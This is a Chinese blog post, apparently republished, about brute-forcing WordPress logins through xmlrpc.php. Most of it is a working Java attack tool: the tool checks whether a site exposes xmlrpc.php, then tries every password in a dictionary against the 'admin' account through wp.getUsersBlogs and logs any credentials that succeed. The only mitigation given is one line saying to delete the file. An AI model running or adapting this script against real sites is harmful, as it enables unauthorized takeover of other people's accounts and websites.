Wordpress xmlrpc.php暴力破解漏洞
Wordpress xmlrpc.php暴力破解漏洞
wordpress是很流行的開源博客,它提供遠程發佈文章的方法,就是使用跟路徑的xmlrpc.php這個文件,最近爆出xmlrpc漏洞,漏洞原理是經過xmlrpc進行認證,即便認證失敗,也不會被Wordpress安裝的安全插件記錄,因此不會觸發密碼輸錯N次被鎖定的狀況。所以就可能被暴力破解,若是密碼又是弱口令的話,就至關危險了。最簡單的解決辦法,就是刪除xmlrpc.php這個文件。閒來無事,用java寫了暴力破解的腳本,其實就是拿着各類用戶名、密碼去不斷調用xmlrpc.phpp這個文件,檢測認證結果,很簡單。只爲娛樂,暴力破解的事情,你們慎重。php
Xmlrpc.java源碼以下:java
package com.yeetrack.security.wordpress;
import org.apache.http.client.ClientProtocolException;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.testng.annotations.Test;
import java.io.*;
/**
* Created by victor wang on 2014/8/2.
* 利用wordpress xmlrpc漏洞,暴力破解密碼
*/
public class Xmlrpc
{
private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";
RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)
.setSocketTimeout(4000).build();
private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);
private CloseableHttpClient httpClient = HttpClients.custom()
.setUserAgent(userAgent)
.setDefaultRequestConfig(requestConfig)
.build();
/**
* 校驗域名是否存在xmlrpc.php這個文件
*/
private boolean checkXmlRpcFile(String domain)
{
domain = wrapperUrl(domain);
if(domain==null)
return false;
HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php");
get.addHeader("User-Agent", userAgent);
CloseableHttpResponse response = null;
String resultString = null;
try {
response = httpClient.execute(get);
if(null == response || response.equals(""))
return false;
resultString = EntityUtils.toString(response.getEntity());
} catch (IOException e) {
e.printStackTrace();
}
return resultString.contains("XML-RPC server accepts POST requests only.");
}
/**
* 暴力嘗試
*/
private boolean forceLogin(String username, String password, String url)
{
//嘗試登陸
HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php");
post.addHeader("User-Agent", userAgent);
String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>"+username+"</value></param> <param><value>"+password+"</value></param> </params></methodCall>";
StringEntity entity = null;
try {
entity = new StringEntity(xmlString);
post.setEntity(entity);
CloseableHttpResponse response = httpClient.execute(post);
String loginResult = EntityUtils.toString(response.getEntity());
if(null== loginResult || loginResult.equals(""))
return false;
if(loginResult.contains("isAdmin")) {
logger.info(url + "登陸成功,userename--->" + username + " password--->" + password);
return true;
}
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
} catch (ClientProtocolException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
return false;
}
/**
* 淨化url,去掉http://或者末尾的path
*/
private String wrapperUrl(String url)
{
if(null == url || url.equals(""))
return null;
if(url.startsWith("http://"))
url = url.substring(7);
if(url.contains("/"))
url = url.substring(0, url.indexOf("/"));
return url;
}
/**
* 破解
*/
@Test
public void test()
{
String url = "http://somewordpress.com/xmlrpc.php";
if(!checkXmlRpcFile(url)) {
logger.info(url+"--->不存在xmlrpc漏洞");
return;
}
File file = new File("src/main/resources/1pass00.txt"); //密碼字典,這個網上一堆一堆的,或者本身生成也可
try {
FileReader fileReader = new FileReader(file);
BufferedReader bufferedReader = new BufferedReader(fileReader);
String line = null;
int count = 1;
while ((line = bufferedReader.readLine()) != null) {
System.out.println("" + count + " " + line);
if(forceLogin("admin", line, url))
break;
count++;
//Thread.sleep(500);
}
} catch (Exception e) { e.printStackTrace(); }
}
}
項目使用maven管理,使用了apache的httpclient和log4j,pom.xml代碼以下:apache
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.yeetrack.security</groupId> <artifactId>wordpress-xmlrpc</artifactId> <version>1.0-SNAPSHOT</version>
繼續閱讀-->安全
相關文章
- 1. 防止WordPress利用xmlrpc.php進行暴力破解以及DDoS
- 2. 暴力破解漏洞攻擊
- 3. wordpress 暴力破解防範
- 4. 「上傳漏洞」以及「登陸頁暴力破解」的防護
- 5. DVWA---暴力破解
- 6. Pikachu-暴力破解
- 7. ssh暴力破解
- 8. pikachu-暴力破解
- 9. wordpress 漏洞_輕鬆發現WordPress漏洞
- 10. DVWA系列之Brute Force(暴力破解)源碼分析及漏洞利用
- 更多相關文章...
- • SQLite Explain(解釋) - SQLite教程
- • 免費ARP詳解 - TCP/IP教程
- • Scala 中文亂碼解決
- • JDK13 GA發佈:5大特性解讀
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
